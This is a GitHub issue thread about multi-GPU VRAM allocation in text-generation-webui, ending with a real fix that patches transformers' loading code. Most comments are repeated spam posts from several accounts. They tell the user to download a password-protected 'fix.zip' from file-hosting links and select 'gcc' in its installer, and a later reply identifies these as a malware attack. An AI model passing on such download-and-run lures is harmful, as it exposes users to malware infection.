### ISSUE TITLE
VRAM is not really controlled by the slider when running unquantized models on multiple GPUs using Transformers.

### ISSUE THREAD

**Issue by IllIIllIlllIIl** [oobabooga/text-generation-webui#6348]
### Describe the bug

I have 2x4090 and 3xA6000.
When loading the model, two of the A6000s only loaded 28.1GB and then stopped loading and loaded another GPU instead.
Despite attempts to reduce the amount of load allocated to the other GPUs these two GPUs (Nr.2&3) still only load 28.1GB and push the excess to RAM making it extremely slow.
You can also see in the screenshot that the GPU arrangement order displayed in the UI is different from the actual GPU arrangement order. Numbers 0 and 1 in the UI are 4090.
And actually the slider of GPU4 in the UI controls the VRAM usage of GPU0.
I also tried unchecking auto-devices but still got the same result. GPU2&3 only loaded about 28GB and then automatically loaded to the next GPU instead of the amount selected by the slider.
This caused me to have insufficient memory in the 6K context even though I had enough VRAM.
My English is not very good and I don't understand coding at all. There may be some inaccurate descriptions.
Thanks in advance for your help.

### Is there an existing issue for this?

- [X] I have searched the existing issues

### Reproduction

1. Double-click "start_windows"
2. Check the "api" under "Boolean command-line flags" in the "Session" page and press "Apply flags/extensions and restart"
3. In the "Model" tab, select load magnum-v2-72b and use the slider to adjust the VRAM allocation size

### Screenshot

![Transformers_GPU_problem](https://github.com/user-attachments/assets/b78523b6-9c6f-4e8f-a034-9c8052eebe7f)

### Logs

```shell
Already included in the screenshot.
```

### System Info

```shell
OS: Windows10 Professional
CPU: AMD Ryzen Threadripper 7960X 24-Cores
RAM: 256GB
GPU: 2x NVIDIA GeForce RTX 4090, 3x NVIDIA RTX A6000
GPU driver: Geforce Game Ready 560.94
Python 3.11.9
```

**Comment by NimaJafariComp** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by IllIIllIlllIIl** [comment]
Thanks for your quick reply.
It's morning now because of the time difference and I have to go to work.
I have downloaded the file.
Please allow me to try again after get off work and report the results.
Sincere thanks.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by IllIIllIlllIIl** [comment]
Sorry, I don't understand how to fix this.
I have unzipped the file. Should I put the "fix" folder under the "installer_files" folder and then run "update_wizard_windows" and select "gcc"??
Sorry for causing trouble.

**Comment by IllIIllIlllIIl** [comment]
> That post with instructions including something "gcc" was a malware attack on github. Hopefully you didn't install anything malicious.

Thanks for the reminder!
Fortunately, I don't know anything about computers, so I just downloaded the compressed file without any further action. After deleting the file, I scanned the computer and found no viruses!

**Comment by RandomInternetPreson** [comment]
The current transformer code might look a little different, but these edits are still applicable.  To fix the gpu vram allocation issue you want to reference the first image.  The top of the first image is what you want to comment out and the bottom of the first image is what you want the code to look like.

![modeling_utils_image](https://github.com/user-attachments/assets/617c3073-33e9-49eb-b2c3-d2b43bf59c3b)


This reverses the loading sequence, useful if you have an extension that uses gpu 0 by default, this way you can leave it empty.  Because if you try to use a size of 0 with transformers, it will throw an error.  So you cant do 0MB, 20000MB, ...

![modelingpyFIX_ReverseOrder](https://github.com/user-attachments/assets/71055c04-09b9-4612-b314-c2834c1dc8dc)

**Comment by RandomInternetPreson** [comment]
Some additional information:

https://github.com/oobabooga/text-generation-webui/issues/4193#issuecomment-1811580073

**Comment by IllIIllIlllIIl** [comment]
Thank you for your detailed illustrations and help!
After following the changes, the second and third GPUs were finally able to successfully load more than 29 GB.
